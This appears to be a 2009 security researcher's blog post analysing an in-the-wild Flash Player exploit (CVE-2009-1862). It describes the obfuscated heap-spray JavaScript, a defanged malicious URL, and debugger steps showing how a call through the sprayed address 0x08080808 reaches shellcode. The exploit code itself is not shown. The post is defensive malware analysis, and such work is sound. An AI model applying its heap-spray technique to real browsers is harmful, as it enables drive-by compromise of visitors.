That’s it for this series. Remember, this chain of infection was triggered when a victim with a vulnerable Flash Player simply viewed a single malicious page – no user intervention was required. This also shows that how active Flash exploits are in the wild. Keep your systems/AV up to date and install latest Flash Player from Adobe.

Be Safe,

Umesh

Thursday, September 10, 2009

In the wild Flash exploit analysis – part 1

Today, one of my colleagues requested that I provide additional details about a web page that we had blocked for a customer. The blocked URL was ‘hxxp://www.39sys39.cn/htm/ie.html’. He wanted details about the threat present on the page. I downloaded the page and found out that it contained obfuscated JavaScript with heap spray code. I also found that the exploit contained an tag with a source file called “xp.swf”. At first glance, it was clear that the page is trying to exploit a Flash vulnerability. The exploit code is shown below:

The above exploit employed simple obfuscation to evade signature engines. If we decode the above script, we find the following:

It is also spraying the heap on an address of “0x08080808”. Shortly, we will learn why this address is needed to exploit the vulnerability. I downloaded both the “ie.html” and “xp.swf” files for further analysis. I also uploaded the “xp.swf” file to Virustotal to see if it was a known exploit or perhaps zero day content. Only 9 out of 41 antivirus engines detected the file as a virus. Those that did, identified the file as an exploit attacking CVE-2009-1862. This is a recent vulnerability, for which exploit code is currently in the wild, affecting Adobe Reader and Adobe Flash player. To check if the exploit was working properly, I replaced the shellcode in the exploit with simple shellcode that will execute “calc.exe”. I opened this file with both Firefox and Internet Explorer and here is what happened,

The JavaScript code successfully exploited the known vulnerability in Flash and executed our replacement shellcode to open “calc.exe”. This demonstrates just how dangerous the vulnerability is as it requires a victim to simply visit a malicious page containing the Flash exploit. No further user intervention is required. In this case, I had replaced the original shellcode for testing and the exploit opened calculator successfully. Next, I wanted to determine the purpose of the original shellcode, so I then modified the original exploit code to force a crash in order to debug further. I ran the file again, this time with Internet Explorer and received the following popup message:

The referenced memory address in the above figure is “0x08214408. The program is unable to read data from an invalid address, which led to a crash. Now if you remember, the original exploit in the first image of the blog uses the “0x08080808” memory address to spray the heap with shellcode. Bingo! This means the program is crashing may be due to memory corruption. That is why the exploit must spray the heap with an address of “0x08080808”. I then clicked on cancel button to debug further. I wanted to find which instruction actually reads the data and calls the shellcode. Here is the first state of the OllyDbg debugger:

Look at the above instructions. The register EDX is trying to read a value from ESI which points to invalid address 08214408. Let’s analyze the instructions that follow.

MOV EDX,DWORD PTR DS:[ESI]

MOV EAX,DWORD PTR DS:[EDX+44]

PUSH EBP

MOV ECX,ESI

CALL EAX

TEST AL,AL

Let’s assume [ESI] contains some value which is moved to EDX. Then EAX will contain the value [EDX+44]. Then the program will push EBP on the stack, move the ESI address to ECX and look at the next instruction “CALL EAX”. This is where a call has been made to execute the shellcode. We can conclude that if we spray the heap with 08080808 and shellcode, [ESI] will contain 08080808, which will be moved to EDX. EAX will also contain 08080808 which will be called after the “MOV ECX, ESI” command. Then this call will jump to heap memory at an address of 0x08080808 and execute the shellcode. Let’s see if that holds true.

This time I reopened the original exploit in the Firefox, put a breakpoint at the above-mentioned instructions and sure enough, we were right. EAX now points to 08080808 and the heap is sprayed with 08 bytes and shellcode. If I press “F9” to continue, it will jump onto the heap area and will execute the instruction found. The instruction 0808 is effectively a NOP sled. It is simply “OR BYTE PTR DS:[EAX],CL” which will do nothing as CL contains 08. It will reach the shellcode by executing 0808 instructions and ultimately execute the malicious code.

This means some field/value from the malicious Flash file is causing memory corruption. Here is the how original shellcode is loaded into memory,

This is just overview of how this exploit works. In the next part we will see what original shellcode does. Specifically, we will identify the additional content downloaded to the victim’s machine.

This exploit proves that flash exploits can be very dangerous. Such exploits do not require user intervention. Simply by visiting a malicious web page, the victim will be exploited.

That’s for part 1 now. Do come back for part 2 of this blog.

Umesh